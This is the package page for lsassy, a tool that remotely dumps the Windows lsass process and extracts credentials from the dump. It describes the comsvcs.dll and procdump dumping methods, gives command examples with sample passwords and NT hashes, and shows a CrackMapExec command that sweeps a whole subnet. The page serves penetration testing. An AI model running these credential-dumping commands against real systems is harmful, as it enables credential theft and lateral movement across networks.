Python library to parse remote lsass dumps
Project description
lsassy
Python library to remotely extract credentials.
Blog post : https://en.hackndo.com/remote-lsass-dump-passwords/
This library uses impacket project to remotely read necessary bytes in lsass dump and pypykatz to extract credentials.
| Chapters | Description |
|---|---|
| Requirements | Requirements to install lsassy from source |
| Basic Usage | Command line template for standalone version |
| Advanced Usage | Advanced usage (Dumping methods, execution methods, ...) |
| CrackMapExec Module | Link to CrackMapExec module included in this repository |
| Examples | Command line examples for standalone and CME module |
| Installation | Installation commands from pip or from source |
| Issues | Read this before creating an issue |
| Acknowledgments | Kudos to these people and tools |
Requirements
Basic Usage
lsassy [--hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target>
Advanced
This tool can dump lsass in different ways.
comsvcs.dll method (Default)
This method only uses built-in Windows files to extract remote credentials. It uses minidump function from comsvcs.dll to dump lsass process. As this can only be done when context has SeDebugPrivilege, and a privileged cmd.exe doesn't have this privilege, it creates a remote task as SYSTEM, runs it and then deletes it.
lsassy [--hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target>
Procdump method
This method uploads procdump.exe from SysInternals to dump lsass process. It will first try to execute procdump using WMI, and if it fails it will create a remote task, execute it and delete it.
lsassy [--hashes [LM:]NT] -p /path/to/procdump.exe [<domain>/]<user>[:<password>]@<target>
Remote parsing only
lsassy can parse an already dumped lsass process.
lsassy [--hashes [LM:]NT] --dumppath /share/path/to/dump.dmp [<domain>/]<user>[:<password>]@<target>
CrackMapExec module
I wrote a CrackMapExec module that uses lsassy to extract credentials on compromised hosts
CrackMapExec module is in cme folder : CME Module
Examples
lsassy
# RunDLL Method
lsassy adsec.local/jsnow:Winter_is_coming@dc01.adsec.local
# Procdump Method
lsassy -p /tmp/procdump.exe adsec.local/jsnow:Winter_is_coming@dc01.adsec.local
# Remote parsing only
lsassy --dumppath C$/Windows/Temp/lsass.dmp adsec.local/jsnow:Winter_is_coming@dc01.adsec.local
# NT Hash Authentication
lsassy --hashes 952c28bd2fd728898411b301475009b7 Administrator@desktop01.adsec.local
CME Module
crackmapexec smb 10.0.0.0/24 -d adsec.local -u Administrator -p Passw0rd -M lsassy -o BLOODHOUND=True NEO4JPASS=bloodhound
Installation
From pip
python3.7 -m pip install lsassy
From sources
python3.7 setup.py install
ChangeLog
v1.0.0
------
* Built-in lsass dump
** Lsass dump using built-in Windows
** Lsass dump using procdump (using -p parameter)
* Add --dumppath to ask for remote parsing only
* Code refactoring
* Add --quiet to quiet output
v0.2.0
------
* Add BloodHound option to CME module (-o BLOODHOUND=True)
- Set compromised targets as "owned" in BloodHound
- Check if compromised users have at least one path to domain admin
* Custom parsing (json, grep, pretty [default])
* New --hashes option to lsassy
* Include CME module in repository
* Add credentials to CME database
v0.1.0
------
First release
Issues
If you find an issue with this tool (that's very plausible !), please
- Check that you're using the latest version
- Send as much details as possible.
- For standalone lsassy, please use the
-ddebug flag - For CME module, please use CrackMapExec
--verboseflag
- For standalone lsassy, please use the
Acknowledgments
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
